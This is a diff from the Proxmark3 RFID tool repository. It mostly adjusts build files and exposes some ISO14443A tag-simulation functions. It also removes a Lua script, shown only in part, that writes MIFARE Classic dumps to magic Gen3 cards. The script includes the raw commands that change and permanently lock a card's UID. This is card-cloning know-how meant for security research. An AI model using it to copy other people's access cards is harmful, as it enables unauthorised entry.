-STANDALONE_MODES += HF_YOUNG HF_MATTYRUN HF_COLIN HF_BOG
+STANDALONE_MODES += HF_...
 ```
 If your mode is using one of the unique features of the RDV4, add it to the proper list:
 ```
 STANDALONE_MODES_REQ_SMARTCARD :=
-STANDALONE_MODES_REQ_FLASH := HF_COLIN HF_BOG
+STANDALONE_MODES_REQ_FLASH :=
 ```
 ## Update MAKEFILE.INC
 Add your source code files like the following sample in the `Makefile.inc`
 ```
-# WITH_STANDALONE_LF_ICERUN
+# WITH_STANDALONE_LF_SKELETON
-ifneq (,$(findstring WITH_STANDALONE_LF_ICERUN,$(APP_CFLAGS)))
+ifneq (,$(findstring WITH_STANDALONE_LF_SKELETON,$(APP_CFLAGS)))
-    SRC_STANDALONE = lf_icerun.c
+    SRC_STANDALONE = lf_skeleton.c
 endif
 # WITH_STANDALONE_LF_FOO
@ -140,4 +140,13 @@ The final steps is to
 When compiling you will see a header showing what configurations your project compiled with.
 Make sure it says your standalone mode name.  
 ## Submitting your code
 Once you're ready to share your mode, please
 * add a line in CHANGELOG.md
 * add your mode in the modes table in doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md
 and submit your PR.
 Happy hacking!
--- a/armsrc/iso14443a.c
+++ b/armsrc/iso14443a.c
@ -837,7 +837,7 @@ static void Code4bitAnswerAsTag(uint8_t cmd) {
 // stop when button is pressed or client usb connection resets
 // or return TRUE when command is captured
 //-----------------------------------------------------------------------------
-static bool GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *len) {
+bool GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *len) {
    // Set FPGA mode to "simulated ISO 14443 tag", no modulation (listen
    // only, since we are receiving, not transmitting).
    // Signal field is off with the appropriate LED
@ -873,7 +873,7 @@ static bool GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *
    return false;
 }
-static bool prepare_tag_modulation(tag_response_info_t *response_info, size_t max_buffer_size)  {
+bool prepare_tag_modulation(tag_response_info_t *response_info, size_t max_buffer_size)  {
    // Example response, answer to MIFARE Classic read block will be 16 bytes + 2 CRC = 18 bytes
    // This will need the following byte array for a modulation sequence
    //    144        data bits (18 * 8)
@ -919,7 +919,7 @@ bool prepare_allocated_tag_modulation(tag_response_info_t *response_info, uint8_
    }
 }
-static bool SimulateIso14443aInit(int tagType, int flags, uint8_t *data, tag_response_info_t **responses, uint32_t *cuid, uint32_t counters[3], uint8_t tearings[3], uint8_t *pages) {
+bool SimulateIso14443aInit(int tagType, int flags, uint8_t *data, tag_response_info_t **responses, uint32_t *cuid, uint32_t counters[3], uint8_t tearings[3], uint8_t *pages) {
    uint8_t sak = 0;
    // The first response contains the ATQA (note: bytes are transmitted in reverse order).
    static uint8_t rATQA[2] = { 0x00 };
--- a/armsrc/iso14443a.h
+++ b/armsrc/iso14443a.h
@ -112,6 +112,8 @@ RAMFUNC int ManchesterDecoding(uint8_t bit, uint16_t offset, uint32_t non_real_t
 void RAMFUNC SniffIso14443a(uint8_t param);
 void SimulateIso14443aTag(uint8_t tagType, uint8_t flags, uint8_t *data);
 bool SimulateIso14443aInit(int tagType, int flags, uint8_t *data, tag_response_info_t **responses, uint32_t *cuid, uint32_t counters[3], uint8_t tearings[3], uint8_t *pages);
 bool GetIso14443aCommandFromReader(uint8_t *received, uint8_t *par, int *len);
 void iso14443a_antifuzz(uint32_t flags);
 void ReaderIso14443a(PacketCommandNG *c);
 void ReaderTransmit(uint8_t *frame, uint16_t len, uint32_t *timing);
@ -136,6 +138,7 @@ int EmSendCmdParEx(uint8_t *resp, uint16_t respLen, uint8_t *par, bool collision
 int EmSendPrecompiledCmd(tag_response_info_t *p_response);
 bool prepare_allocated_tag_modulation(tag_response_info_t *response_info, uint8_t **buffer, size_t *max_buffer_size);
 bool prepare_tag_modulation(tag_response_info_t *response_info, size_t max_buffer_size);
 bool EmLogTrace(uint8_t *reader_data, uint16_t reader_len, uint32_t reader_StartTime, uint32_t reader_EndTime, uint8_t *reader_Parity,
                uint8_t *tag_data, uint16_t tag_len, uint32_t tag_StartTime, uint32_t tag_EndTime, uint8_t *tag_Parity);
--- a/client/CMakeLists.txt
+++ b/client/CMakeLists.txt
@ -1,3 +1,10 @@
 # MINGW:
 #  On ProxSpace 3.4:
 #    cmake -G"MSYS Makefiles" ..
 #  On Proxspace 3.3 or less, you need to install cmake:
 #    pacman -S mingw-w64-x86_64-cmake
 #    /mingw64/bin/cmake -G"MSYS Makefiles" ..
 cmake_minimum_required(VERSION 3.10)
 project(proxmark3)
@ -5,8 +12,6 @@ if(CMAKE_VERSION VERSION_LESS "3.7.0")
    set(CMAKE_INCLUDE_CURRENT_DIR ON)
 endif()
 set(CMAKE_CXX_STANDARD 14)
 if(APPLE AND EXISTS /usr/local/opt/qt5)
    # Homebrew installs Qt5 (up to at least 5.11.0) in
    # /usr/local/qt5. Ensure that it can be found by CMake
@ -32,29 +37,6 @@ endforeach()
 SET (CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_CURRENT_SOURCE_DIR}/cmake")
 INCLUDE(FindSSE)
 if(NOT SSE2_FOUND)
    MESSAGE(STATUS "Could not find hardware support for SSE2 on this machine.")
 endif(NOT SSE2_FOUND)
 if(NOT SSE3_FOUND)
    MESSAGE(STATUS "Could not find hardware support for SSE3 on this machine.")
 endif(NOT SSE3_FOUND)
 if(NOT SSSE3_FOUND)
    MESSAGE(STATUS "Could not find hardware support for SSSE3 on this machine.")
 endif(NOT SSSE3_FOUND)
 if(NOT SSE4_1_FOUND)
    MESSAGE(STATUS "Could not find hardware support for SSE4.1 on this machine.")
 endif(NOT SSE4_1_FOUND)
 if(NOT AVX_FOUND)
    MESSAGE(STATUS "Could not find hardware support for AVX on this machine.")
 endif(NOT AVX_FOUND)
 if(NOT AVX2_FOUND)
    MESSAGE(STATUS "Could not find hardware support for AVX2 on this machine.")
 endif(NOT AVX2_FOUND)
 if(NOT AVX512_FOUND)
    MESSAGE(STATUS "Could not find hardware support for AVX512 on this machine.")
 endif(NOT AVX512_FOUND)
 add_subdirectory(deps)
 set (TARGET_SOURCES
@ -207,10 +189,6 @@ if (APPLE)
    set(ADDITIONAL_LNK "-framework Foundation" "-framework AppKit")
 endif (APPLE)
 if (MINGW)
    set(CMAKE_CXX_FLAGS "-mno-ms-bitfields -fexec-charset=cp850 ${CMAKE_CXX_FLAGS}")
 endif (MINGW)
 if (Qt5_FOUND)
    message("Qt5 library found, building gui :)")
    set(CMAKE_AUTOMOC ON)
@ -238,6 +216,17 @@ add_executable(
 target_compile_options(proxmark3 PUBLIC -Wall -Werror -O3)
 if (MINGW)
    # Mingw uses by default Microsoft printf, we want the GNU printf (e.g. for %z)
    # and setting _ISOC99_SOURCE sets internally __USE_MINGW_ANSI_STDIO=1
    # FTR __USE_MINGW_ANSI_STDIO seems deprecated in Mingw32
    # but not Mingw64 https://fr.osdn.net/projects/mingw/lists/archive/users/2019-January/000199.html
    target_compile_definitions(proxmark3 PRIVATE _ISOC99_SOURCE)
    set(CMAKE_C_FLAGS "-mno-ms-bitfields -fexec-charset=cp850 ${CMAKE_C_FLAGS}")
    set(CMAKE_CXX_FLAGS "-mno-ms-bitfields -fexec-charset=cp850 ${CMAKE_CXX_FLAGS}")
 endif (MINGW)
 target_include_directories(proxmark3 PRIVATE
        ../common
        ../common_fpga
--- a/client/Makefile
+++ b/client/Makefile
@ -57,11 +57,16 @@ LIBS = -I$(LUALIBPATH) -I$(MBEDTLSLIBPATH) -I$(JANSSONLIBPATH) -I$(CBORLIBPATH)
 INCLUDES_CLIENT = -I./src -I../include -I../common -I../common_fpga $(LIBS)
 CFLAGS ?= -Wall -Werror -O3
 # We cannot just use CFLAGS+=... because it has impact on sub-makes if CFLAGS is defined in env:
-PM3CFLAGS = $(CFLAGS) -std=c99 -D_ISOC99_SOURCE $(INCLUDES_CLIENT)
+PM3CFLAGS = $(CFLAGS) $(INCLUDES_CLIENT)
 # WIP Testing
 #PM3CFLAGS = $(CFLAGS) -std=c11 -pedantic $(INCLUDES_CLIENT)
 PREFIX ?= /usr/local
 ifneq (,$(findstring MINGW,$(platform)))
    # Mingw uses by default Microsoft printf, we want the GNU printf (e.g. for %z)
    # and setting _ISOC99_SOURCE sets internally __USE_MINGW_ANSI_STDIO=1
    # FTR __USE_MINGW_ANSI_STDIO seems deprecated in Mingw32
    # but not Mingw64 https://fr.osdn.net/projects/mingw/lists/archive/users/2019-January/000199.html
    PM3CFLAGS += -D_ISOC99_SOURCE
    PM3CFLAGS += -mno-ms-bitfields -fexec-charset=cp850
 endif
 CXXFLAGS ?= -Wall -Werror -O3
@ -77,6 +82,8 @@ else
    LDFLAGS += -framework Foundation -framework AppKit
    LDLIBS := -L/usr/local/opt/readline/lib $(LDLIBS)
    LIBS := -I/usr/local/opt/readline/include $(LIBS)
    # cf brew info qt: qt not symlinked anymore
    PKG_CONFIG_PATH := PKG_CONFIG_PATH=/usr/local/opt/qt/lib/pkgconfig
 else
    LUALIB +=  -ldl
    LUAPLATFORM = linux
@ -85,18 +92,19 @@ endif
 ifneq ($(SKIPQT),1)
    # Check for correctly configured Qt5
-    QTINCLUDES = $(shell pkg-config --cflags Qt5Core Qt5Widgets 2>/dev/null)
+    QTINCLUDES = $(shell $(PKG_CONFIG_PATH) pkg-config --cflags Qt5Core Qt5Widgets 2>/dev/null)
-    QTLDLIBS = $(shell pkg-config --libs Qt5Core Qt5Widgets 2>/dev/null)
+    QTLDLIBS = $(shell $(PKG_CONFIG_PATH) pkg-config --libs Qt5Core Qt5Widgets 2>/dev/null)
-    MOC = $(shell pkg-config --variable=host_bins Qt5Core)/moc
+    MOC = $(shell $(PKG_CONFIG_PATH) pkg-config --variable=host_bins Qt5Core)/moc
-    UIC = $(shell pkg-config --variable=host_bins Qt5Core)/uic
+    UIC = $(shell $(PKG_CONFIG_PATH) pkg-config --variable=host_bins Qt5Core)/uic
    ifeq ($(QTINCLUDES), )
    # if Qt5 not found check for correctly configured Qt4
-        QTINCLUDES = $(shell pkg-config --cflags QtCore QtGui 2>/dev/null)
+        QTINCLUDES = $(shell $(PKG_CONFIG_PATH) pkg-config --cflags QtCore QtGui 2>/dev/null)
-        QTLDLIBS = $(shell pkg-config --libs QtCore QtGui 2>/dev/null)
+        QTLDLIBS = $(shell $(PKG_CONFIG_PATH) pkg-config --libs QtCore QtGui 2>/dev/null)
-        MOC = $(shell pkg-config --variable=moc_location QtCore)
+        MOC = $(shell $(PKG_CONFIG_PATH) pkg-config --variable=moc_location QtCore)
-        UIC = $(shell pkg-config --variable=uic_location QtCore)
+        UIC = $(shell $(PKG_CONFIG_PATH) pkg-config --variable=uic_location QtCore)
    else
-        PM3CXXFLAGS += -std=c++11 -fPIC
+        # On OSX Qt5 is claiming for a C++11 compiler (gnu++14 works too, but if nothing it fails)
        PM3CXXFLAGS += -fPIC -std=c++11
    endif
    ifeq ($(QTINCLUDES), )
    # if both pkg-config commands failed, search in common places
@ -106,7 +114,7 @@ ifneq ($(SKIPQT),1)
            ifneq ($(wildcard $(QTDIR)/include/QtWidgets),)
                QTINCLUDES += -I$(QTDIR)/include/QtWidgets
                QTLDLIBS = -L$(QTDIR)/lib -lQt5Widgets -lQt5Gui -lQt5Core
-                PM3CXXFLAGS += -std=c++11 -fPIC
+                PM3CXXFLAGS += -fPIC -std=c++11
            endif
            MOC = $(QTDIR)/bin/moc
            UIC = $(QTDIR)/bin/uic
--- a/client/cmake/FindSSE.cmake
+++ b/client/cmake/FindSSE.cmake
@ -1,168 +0,0 @@
 # Check if SSE/AVX instructions are available on the machine where
 # the project is compiled.
 IF(CMAKE_SYSTEM_NAME MATCHES "Linux")
    EXEC_PROGRAM(cat ARGS "/proc/cpuinfo" OUTPUT_VARIABLE CPUINFO)
    STRING(REGEX REPLACE "^.*(sse2).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "sse2" "${SSE_THERE}" SSE2_TRUE)
    IF (SSE2_TRUE)
        set(SSE2_FOUND true CACHE BOOL "SSE2 available on host")
    ELSE (SSE2_TRUE)
        set(SSE2_FOUND false CACHE BOOL "SSE2 available on host")
    ENDIF (SSE2_TRUE)
    # /proc/cpuinfo apparently omits sse3 :(
    STRING(REGEX REPLACE "^.*[^s](sse3).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "sse3" "${SSE_THERE}" SSE3_TRUE)
    IF (NOT SSE3_TRUE)
        STRING(REGEX REPLACE "^.*(T2300).*$" "\\1" SSE_THERE ${CPUINFO})
        STRING(COMPARE EQUAL "T2300" "${SSE_THERE}" SSE3_TRUE)
    ENDIF (NOT SSE3_TRUE)
    STRING(REGEX REPLACE "^.*(ssse3).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "ssse3" "${SSE_THERE}" SSSE3_TRUE)
    IF (SSE3_TRUE OR SSSE3_TRUE)
        set(SSE3_FOUND true CACHE BOOL "SSE3 available on host")
    ELSE (SSE3_TRUE OR SSSE3_TRUE)
        set(SSE3_FOUND false CACHE BOOL "SSE3 available on host")
    ENDIF (SSE3_TRUE OR SSSE3_TRUE)
    IF (SSSE3_TRUE)
        set(SSSE3_FOUND true CACHE BOOL "SSSE3 available on host")
    ELSE (SSSE3_TRUE)
        set(SSSE3_FOUND false CACHE BOOL "SSSE3 available on host")
    ENDIF (SSSE3_TRUE)
    STRING(REGEX REPLACE "^.*(sse4_1).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "sse4_1" "${SSE_THERE}" SSE41_TRUE)
    IF (SSE41_TRUE)
        set(SSE4_1_FOUND true CACHE BOOL "SSE4.1 available on host")
    ELSE (SSE41_TRUE)
        set(SSE4_1_FOUND false CACHE BOOL "SSE4.1 available on host")
    ENDIF (SSE41_TRUE)
    STRING(REGEX REPLACE "^.*(avx).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "avx" "${SSE_THERE}" AVX_TRUE)
    IF (AVX_TRUE)
        set(AVX_FOUND true CACHE BOOL "AVX available on host")
    ELSE (AVX_TRUE)
        set(AVX_FOUND false CACHE BOOL "AVX available on host")
    ENDIF (AVX_TRUE)
    STRING(REGEX REPLACE "^.*(avx2).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "avx2" "${SSE_THERE}" AVX2_TRUE)
    IF (AVX2_TRUE)
        set(AVX2_FOUND true CACHE BOOL "AVX2 available on host")
    ELSE (AVX2_TRUE)
        set(AVX2_FOUND false CACHE BOOL "AVX2 available on host")
    ENDIF (AVX2_TRUE)
    STRING(REGEX REPLACE "^.*(avx512).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "avx512" "${SSE_THERE}" AVX2_TRUE)
    IF (AVX512_TRUE)
        set(AVX512_FOUND true CACHE BOOL "AVX512 available on host")
    ELSE (AVX2_TRUE)
        set(AVX512_FOUND false CACHE BOOL "AVX512 available on host")
    ENDIF (AVX512_TRUE)
 ELSEIF(CMAKE_SYSTEM_NAME MATCHES "Darwin")
    EXEC_PROGRAM("/usr/sbin/sysctl -n machdep.cpu.features" OUTPUT_VARIABLE
            CPUINFO)
    STRING(REGEX REPLACE "^.*[^S](SSE2).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "SSE2" "${SSE_THERE}" SSE2_TRUE)
    IF (SSE2_TRUE)
        set(SSE2_FOUND true CACHE BOOL "SSE2 available on host")
    ELSE (SSE2_TRUE)
        set(SSE2_FOUND false CACHE BOOL "SSE2 available on host")
    ENDIF (SSE2_TRUE)
    STRING(REGEX REPLACE "^.*[^S](SSE3).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "SSE3" "${SSE_THERE}" SSE3_TRUE)
    IF (SSE3_TRUE)
        set(SSE3_FOUND true CACHE BOOL "SSE3 available on host")
    ELSE (SSE3_TRUE)
        set(SSE3_FOUND false CACHE BOOL "SSE3 available on host")
    ENDIF (SSE3_TRUE)
    STRING(REGEX REPLACE "^.*(SSSE3).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "SSSE3" "${SSE_THERE}" SSSE3_TRUE)
    IF (SSSE3_TRUE)
        set(SSSE3_FOUND true CACHE BOOL "SSSE3 available on host")
    ELSE (SSSE3_TRUE)
        set(SSSE3_FOUND false CACHE BOOL "SSSE3 available on host")
    ENDIF (SSSE3_TRUE)
    STRING(REGEX REPLACE "^.*(SSE4.1).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "SSE4.1" "${SSE_THERE}" SSE41_TRUE)
    IF (SSE41_TRUE)
        set(SSE4_1_FOUND true CACHE BOOL "SSE4.1 available on host")
    ELSE (SSE41_TRUE)
        set(SSE4_1_FOUND false CACHE BOOL "SSE4.1 available on host")
    ENDIF (SSE41_TRUE)
    STRING(REGEX REPLACE "^.*(AVX).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "AVX" "${SSE_THERE}" AVX_TRUE)
    IF (AVX_TRUE)
        set(AVX_FOUND true CACHE BOOL "AVX available on host")
    ELSE (AVX_TRUE)
        set(AVX_FOUND false CACHE BOOL "AVX available on host")
    ENDIF (AVX_TRUE)
    STRING(REGEX REPLACE "^.*(AVX2).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "AVX2" "${SSE_THERE}" AVX2_TRUE)
    IF (AVX2_TRUE)
        set(AVX2_FOUND true CACHE BOOL "AVX2 available on host")
    ELSE (AVX2_TRUE)
        set(AVX2_FOUND false CACHE BOOL "AVX2 available on host")
    ENDIF (AVX2_TRUE)
    STRING(REGEX REPLACE "^.*(AVX512).*$" "\\1" SSE_THERE ${CPUINFO})
    STRING(COMPARE EQUAL "AVX512" "${SSE_THERE}" AVX2_TRUE)
    IF (AVX2_TRUE)
        set(AVX2_FOUND true CACHE BOOL "AVX512 available on host")
    ELSE (AVX2_TRUE)
        set(AVX2_FOUND false CACHE BOOL "AVX512 available on host")
    ENDIF (AVX2_TRUE)
 ELSEIF(CMAKE_SYSTEM_NAME MATCHES "Windows")
    # TODO
    set(SSE2_FOUND   true  CACHE BOOL "SSE2 available on host")
    set(SSE3_FOUND   false CACHE BOOL "SSE3 available on host")
    set(SSSE3_FOUND  false CACHE BOOL "SSSE3 available on host")
    set(SSE4_1_FOUND false CACHE BOOL "SSE4.1 available on host")
    set(AVX_FOUND false CACHE BOOL "AVX available on host")
    set(AVX2_FOUND false CACHE BOOL "AVX2 available on host")
    set(AVX512_FOUND false CACHE BOOL "AVX512 available on host")
 ELSE(CMAKE_SYSTEM_NAME MATCHES "Linux")
    set(SSE2_FOUND   true  CACHE BOOL "SSE2 available on host")
    set(SSE3_FOUND   false CACHE BOOL "SSE3 available on host")
    set(SSSE3_FOUND  false CACHE BOOL "SSSE3 available on host")
    set(SSE4_1_FOUND false CACHE BOOL "SSE4.1 available on host")
    set(AVX_FOUND false CACHE BOOL "AVX available on host")
    set(AVX2_FOUND false CACHE BOOL "AVX2 available on host")
    set(AVX512_FOUND false CACHE BOOL "AVX512 available on host")
 ENDIF(CMAKE_SYSTEM_NAME MATCHES "Linux")
 if(NOT SSE2_FOUND)
    MESSAGE(STATUS "Could not find hardware support for SSE2 on this machine.")
 endif(NOT SSE2_FOUND)
 if(NOT SSE3_FOUND)
    MESSAGE(STATUS "Could not find hardware support for SSE3 on this machine.")
 endif(NOT SSE3_FOUND)
 if(NOT SSSE3_FOUND)
    MESSAGE(STATUS "Could not find hardware support for SSSE3 on this machine.")
 endif(NOT SSSE3_FOUND)
 if(NOT SSE4_1_FOUND)
    MESSAGE(STATUS "Could not find hardware support for SSE4.1 on this machine.")
 endif(NOT SSE4_1_FOUND)
 if(NOT AVX_FOUND)
    MESSAGE(STATUS "Could not find hardware support for AVX on this machine.")
 endif(NOT AVX_FOUND)
 if(NOT AVX2_FOUND)
    MESSAGE(STATUS "Could not find hardware support for AVX2 on this machine.")
 endif(NOT AVX2_FOUND)
 if(NOT AVX512_FOUND)
    MESSAGE(STATUS "Could not find hardware support for AVX512 on this machine.")
 endif(NOT AVX512_FOUND)
 mark_as_advanced(SSE2_FOUND SSE3_FOUND SSSE3_FOUND SSE4_1_FOUND, AVX_FOUND, AVX2_FOUND)
--- a/client/deps/amiibo.cmake
+++ b/client/deps/amiibo.cmake
@ -5,8 +5,6 @@
 #amiitool.c $(MYSRCS) ../../../../common/../../commonutil.c ../ui.c -lreadline -lm ../../../../common/mbedtls/libmbedtls.a \
 #-o amiitool
 set_property(SOURCE PROPERTY C_STANDARD 99)
 add_library(amiibo STATIC
        amiitool/amiibo.c
        amiitool/drbg.c
--- a/client/deps/amiitool/Makefile
+++ b/client/deps/amiitool/Makefile
@ -1,6 +1,6 @@
 MYSRCPATHS =
 MYINCLUDES = -I. -I.. -I../jansson -I../../../common -I../../../include
-MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
+MYCFLAGS =
 MYDEFS =
 MYSRCS = \
 	amiibo.c \
--- a/client/deps/cliparser/Makefile
+++ b/client/deps/cliparser/Makefile
@ -1,6 +1,6 @@
 MYSRCPATHS =
 MYINCLUDES = -I../../../common -I../../../include -I../../src
-MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
+MYCFLAGS =
 MYDEFS =
 MYSRCS = \
 	argtable3.c \
--- a/client/deps/hardnested.cmake
+++ b/client/deps/hardnested.cmake
@ -1,22 +1,23 @@
 set_property(SOURCE PROPERTY C_STANDARD 99)
 ## CPU-specific code
 ## These are mostly for x86-based architectures, which is not useful for many Android devices.
 add_library(hardnested_nosimd OBJECT
        hardnested/hardnested_bf_core.c
        hardnested/hardnested_bitarray_core.c)
 target_compile_options(hardnested_nosimd PRIVATE -Wall -Werror -O3)
 target_include_directories(hardnested_nosimd PRIVATE
        ../../common
        ../../include)
 target_compile_options(hardnested_nosimd PRIVATE -Wall -Werror -O3)
-set(X86_CPUS x86 x86_64 i686)
+## CPU-specific code
 ## These are mostly for x86-based architectures, which is not useful for many Android devices.
 ## Mingw platforms: AMD64
 set(X86_CPUS x86 x86_64 i686 AMD64)
 message(STATUS "CMAKE_SYSTEM_PROCESSOR := ${CMAKE_SYSTEM_PROCESSOR}")
 if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS)
    message(STATUS "Building optimised x86/x86_64 binaries")
    target_compile_options(hardnested_nosimd BEFORE PRIVATE
            -mno-mmx -mno-sse2 -mno-avx -mno-avx2 -mno-avx512f)
--- a/client/deps/hardnested/Makefile
+++ b/client/deps/hardnested/Makefile
@ -1,6 +1,6 @@
 MYSRCPATHS =
 MYINCLUDES = -I../../../common -I../../../include -I../../src -I../jansson
-MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
+MYCFLAGS =
 MYDEFS =
 MYSRCS = hardnested_bruteforce.c
@ -24,7 +24,7 @@ MYOBJS += $(MULTIARCHSRCS:%.c=$(OBJDIR)/%_NOSIMD.o) \
            $(MULTIARCHSRCS:%.c=$(OBJDIR)/%_AVX.o) \
            $(MULTIARCHSRCS:%.c=$(OBJDIR)/%_AVX2.o)
-SUPPORTS_AVX512 :=  $(shell echo | gcc -E -mavx512f - > /dev/null 2>&1 && echo "True" )
+SUPPORTS_AVX512 :=  $(shell echo | $(CC) -E -mavx512f - > /dev/null 2>&1 && echo "True" )
 HARD_SWITCH_NOSIMD = -mno-mmx -mno-sse2 -mno-avx -mno-avx2
 HARD_SWITCH_MMX = -mmmx -mno-sse2 -mno-avx -mno-avx2
--- a/client/deps/hardnested/hardnested_tables.c
+++ b/client/deps/hardnested/hardnested_tables.c
@ -20,7 +20,7 @@
 //-----------------------------------------------------------------------------
 // To compile it:
-// gcc -std=c99 -I ../../common -o hardnested_tables hardnested_tables.c
+// gcc -I../../../common -I../../../include -o hardnested_tables hardnested_tables.c
 #include <inttypes.h>
 #include <stdbool.h>
--- a/client/deps/jansson.cmake
+++ b/client/deps/jansson.cmake
@ -1,5 +1,3 @@
 set_property(SOURCE PROPERTY C_STANDARD 99)
 add_library(jansson STATIC
        jansson/dump.c
        jansson/error.c
--- a/client/deps/jansson/Makefile
+++ b/client/deps/jansson/Makefile
@ -1,6 +1,6 @@
 MYSRCPATHS =
 MYINCLUDES = -I.
-MYCFLAGS = -std=c99 -D_ISOC99_SOURCE -Wno-unused-function
+MYCFLAGS = -Wno-unused-function
 MYDEFS = -DHAVE_STDINT_H
 MYSRCS = \
 	dump.c \
--- a/client/deps/liblua/Makefile
+++ b/client/deps/liblua/Makefile
@ -1,7 +1,6 @@
 MYSRCPATHS =
 MYINCLUDES = -I.
-# Lua lib is not ready for C99 style...
+# Lua lib requires GNU extensions (implicit declarations of functions): -std=gnu99 or -std=gnu11
 #MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
 MYCFLAGS =
 MYDEFS = -DLUA_COMPAT_ALL $(SYSCFLAGS)
 MYSRCS =	lapi.c lcode.c lctype.c ldebug.c ldo.c ldump.c lfunc.c lgc.c llex.c \
--- a/client/deps/mbedtls.cmake
+++ b/client/deps/mbedtls.cmake
@ -1,5 +1,3 @@
 set_property(SOURCE PROPERTY C_STANDARD 99)
 add_library(mbedtls STATIC
        ../../common/mbedtls/aes.c
        ../../common/mbedtls/asn1parse.c
--- a/client/deps/reveng.cmake
+++ b/client/deps/reveng.cmake
@ -1,5 +1,3 @@
 set_property(SOURCE PROPERTY C_STANDARD 99)
 add_library(reveng STATIC
        reveng/bmpbit.c
        reveng/cli.c
--- a/client/deps/reveng/Makefile
+++ b/client/deps/reveng/Makefile
@ -5,7 +5,7 @@
 MYSRCPATHS =
 MYINCLUDES = -I../cliparser
-MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
+MYCFLAGS =
 MYDEFS = -DPRESETS
 MYSRCS = \
 	bmpbit.c \
--- a/client/deps/tinycbor/Makefile
+++ b/client/deps/tinycbor/Makefile
@ -1,7 +1,6 @@
 MYSRCPATHS =
 MYINCLUDES =
 # Strange errors on Mingw when compiling with C99
 #MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
 MYCFLAGS =
 MYDEFS =
 MYSRCS = \
--- a/client/deps/zlib.cmake
+++ b/client/deps/zlib.cmake
@ -1,5 +1,3 @@
 set_property(SOURCE PROPERTY C_STANDARD 99)
 add_library(z STATIC
        ../../common/zlib/deflate.c
        ../../common/zlib/adler32.c
--- a/client/luascripts/mfc_gen3_writer.lua
+++ b/client/luascripts/mfc_gen3_writer.lua
@ -1,390 +0,0 @@
 local utils = require('utils')
 local getopt = require('getopt')
 local cmds = require('commands')
 local read14a = require('read14a')
 --
 ---
 -------------------------------
 -- Notes
 -------------------------------
 ---
 --
 --[[
 ---Suggestions of improvement:
 --- Add support another types of dumps: BIN, JSON
 --- Maybe it will be not only as `mfc_gen3_writer`, like a universal dump manager.
 --- Add undependence from the operation system. At the moment code not working in Linux.
 --- Add more chinesse backdoors RAW commands for UID changing (find RAW for the 4 byte familiar chinese card, from native it soft: http://bit.ly/39VIDsU)
 --- Hide system messages when you writing a dumps, replace it to some of like [#####----------] 40%
 -- iceman notes:
 --  doesn't take consideration filepaths for dump files.
 --  doesn't allow A keys for authenticating when writing
 --  doesn't verify that card is magic gen3.
 --  doesn't take several versions of same dump ( -1, -2, -3 ) styles.
 --]]
 --
 ---
 -------------------------------
 -- Script hat
 -------------------------------
 ---
 --
 copyright = ''
 author = 'Winds'
 version = 'v1.0.0'
 desc = [[
    The script gives you a easy way to write your *.eml dumps onto normal MFC and magic Gen3 cards.
    Works with both 4 and 7 bytes NXP MIFARE Classic 1K cards.
    The script also has the possibility to change UID and permanent lock uid on magic Gen3 cards.
    It supports the following functionality.
    1. Write it to the same  of current card UID.
    2. Write it to magic Gen3 card.
    3. Change uid to match dump on magic Gen3 card.
    4. Permanent lock UID on magic Gen3 card.
    5. Erase all data at the card and set the FF FF FF FF FF FF keys, and Access Conditions to 78778800.
    Script works in a wizard styled way.
 ]]
 example = [[
    1. script run mfc_gen3_writer
 ]]
 usage = [[
    Select your *.eml dump from list to write to the card.
 ]]
 --
 ---
 -------------------------------
 -- Global variables
 -------------------------------
 ---
 --
 local DEBUG = false -- the debug flag
 local files = {} -- Array for eml files
 local b_keys = {} -- Array for B keys
 local eml = {} -- Array for data in block 32
 local num_dumps = 0 -- num of found eml dump files
 local tab = string.rep('-', 64)
 local empty = string.rep('0', 32) -- Writing blocks
 local default_key = 'FFFFFFFFFFFF' -- Writing blocks
 local default_key_type = '01' --KeyA: 00, KeyB: 01
 local default_key_blk = 'FFFFFFFFFFFF78778800FFFFFFFFFFFF' -- Writing blocks
 local piswords_uid_lock = 'hf 14a raw -s -c -t 2000 90fd111100'
 local piswords_uid_change = 'hf 14a raw -s -c -t 2000 90f0cccc10'
 local cmd_wrbl = 'hf mf wrbl %d B %s %s' -- Writing blocks
 --
 ---
 -------------------------------
 -- A debug printout-function
 -------------------------------
 ---
 --
 local function dbg(args)
    if not DEBUG then return end
    if type(args) == 'table' then
        local i = 1
        while args[i] do
            dbg(args[i])
            i = i+1
        end
    else
        print('###', args)
    end
 end
 --
 ---
 -------------------------------
 -- This is only meant to be used when errors occur
 -------------------------------
 ---
 --
 local function oops(err)
    print('ERROR:', err)
    core.clearCommandBuffer()
    return nil, err
 end
 --
 ---
 -------------------------------
 -- Usage help
 -------------------------------
 ---
 --
 local function help()
    print(copyright)
    print(author)
    print(version)
    print(desc)
    print('Example usage')
    print(example)
    print(usage)
 end
 --
 ---
 -------------------------------
 -- GetUID
 -------------------------------
 ---
 --
 local function GetUID()
    return read14a.read(true, true).uid
 end
 --
 local function dropfield()
    read14a.disconnect()
    core.clearCommandBuffer()
 end
 --
 ---
 -------------------------------
